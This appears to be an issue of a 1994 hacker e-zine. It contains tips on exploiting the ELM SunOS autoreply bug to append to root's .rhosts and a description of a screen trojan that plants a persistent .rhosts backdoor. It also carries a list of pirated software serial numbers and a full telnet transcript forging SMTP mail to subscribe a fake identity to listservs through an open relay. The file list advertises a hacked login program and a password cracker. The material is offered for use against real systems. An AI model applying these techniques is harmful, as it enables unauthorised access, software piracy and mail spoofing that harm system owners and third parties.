$$$$ $$ $$$$ $ $ $$ $$ $ $ $ $$ $$ $$ $$ $$$$ $ $$ $$$ $$ $$$ $$$ $$$ $$ $ $$ $$ $$ $ $$ $ $$$$ $ $ $$ $$ $ $ $$ $$ $ $$ $ $$ $$ $ $ $$ $$ $$ $ $$ $$$ $ $$ $ $ $$ $$ $$ $$$$ $$$$$$ $ $$ $$$$ $$ $$ $ $$ $ $$ $$$ $$ $ $$ $ $$$ $$ $$ $ $$ $$ $$ $$ $ $$ $ $$$ $$ $$ $ $$ $$ $$ $$ $ $ $$$ $ $$$ $$ $ $ $$ $$$ $ $ $$ $ $$$$ $ .oO[Issue #2]Oo. .oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oO Contents ~~~~~~~~ [1] A Cheap Unix Trick You Already Knew [2] 12/94 Serial # List [3] How To Listserv For Posterity And Pleasure File List ~~~~~~~~~ bm-westd.mod Western Delirium uweber .jpg Photo of Ursula "Last Gasp" Weber ap-dic2 .dic Semi-Obscure Band Name Password Dictionary bm-crypt.c Mega-XOR Scrambler bm-crypt.exe Mega-XOR Scrambler (Compiled) bm-login.c BSDish Generic Hacked Login screen .gz Cheap Unix Screen Trojan (Gzipped) tinycrk .c TinyCrack v1.0 sooth .c Fixes Passwd Files E-Mail Address - delirium@cyberspace.org ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ .oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oO The ELM SunOS autoreply bug (which still works on a few systems, BTW) creates a file named `/etc/autoreply.save' on some systems, which is a copy of root's appended .rhosts (including your account name). Don't forget to remove it (Doh). Regarding the Cheap Unix Screen Trojan; this is just a unix shell script screen trojan (for when people hit ps -aux |grep screen and then get on your ass for a copy). It creates an .rhosts file, chmod 600's it, then appends a couple lines to thier .login file to generate a new one just in case they delete it. I wouldn't reccomend changing it to chmod 644 since 2nd/3rd party readable .rhosts' are a red light on most security auditing programs. Just in case they type out the script all the dangerous lines are at the bottom. .oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oO Title Serial # ~~~~~ ~~~~~~~~ 386Max v7.0 40090206002 Adobe Photoshop 3 PWW300R3000011-926 Adobe Premier v4.0 MBW400R3900106-762 Autocad AME 631CBEB9 Corel Flow v2.0 Win SAT5077300794 Dbase IV IA 712A10518133 Fauve Mattisse 1733767 Fractal Design Painter 2 0700585AQK Fractal Design Painter X/2 0700418QDY Fractal Design Painter 3 PW300NAZ0003220-SUZX-001 Halo Desktop Imager HDI4400 Hijakk Pro C78VZ9F5 Intermail 6A-000-001234 Lotus 123 Win 1F00028-01104360 Marvel Screen Saver MVW-92958-1201 Mathematica Win 2549-51771-93417-6270 Peatchtree Accounting Win 9257595 Photostyler Win 15-1115-201108382 QEMM 001-32H-72414 Simpson's Screen Saver ZQW-35600-2581 Stacker v4.0 U40AA079658 Ventura Picture Pro PPR010141 Visual Reality VRW02449 Winfax Pro 1321-2123-7176 WinSleuth Gold Plus 240-14256 X-Men Screen Saver AD3-00670-6681 .oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oO % telnet telnet> o (to) highland.edu 25 Trying 204.57.138.2 ... Connected to highland.edu Escape character is '^]'. 220-highland.edu IBM CM/VMS Sendmail 1.0 ready at Sun, 25 Dec 1994 01: 16:23 -0800 220 ESMTP spoken here helo localhost 250 highland.edu Hello your.domain.com [12.5.5.20], pleased to meet you mail from: urk3l 250 urk3l... Sender ok rcpt to: LISTSERV@VM1.NODAK.EDU 250 LISTSERV@VM1.NODAK.EDU... Recipient ok data 354 Enter mail, end with "." on a line by itself Subscription register Steve Urkel subscribe TEST Steve Urkel subscribe DIGNITY Steve Urkel subscribe AUGLBC-L Steve Urkel subscribe CLGSG-L Steve Urkel subscribe TEST@EARNCC Steve Urkel subscribe TEST@TRITU Steve Urkel subscribe TEST@ICNUCEVM Steve Urkel subscribe TEST@TREARN Steve Urkel . 250 BAA07111 Message accepted for delivery quit 221 highland.edu closing connection Connection closed by foreign host. .oO[ End Of Transmission ]Oo.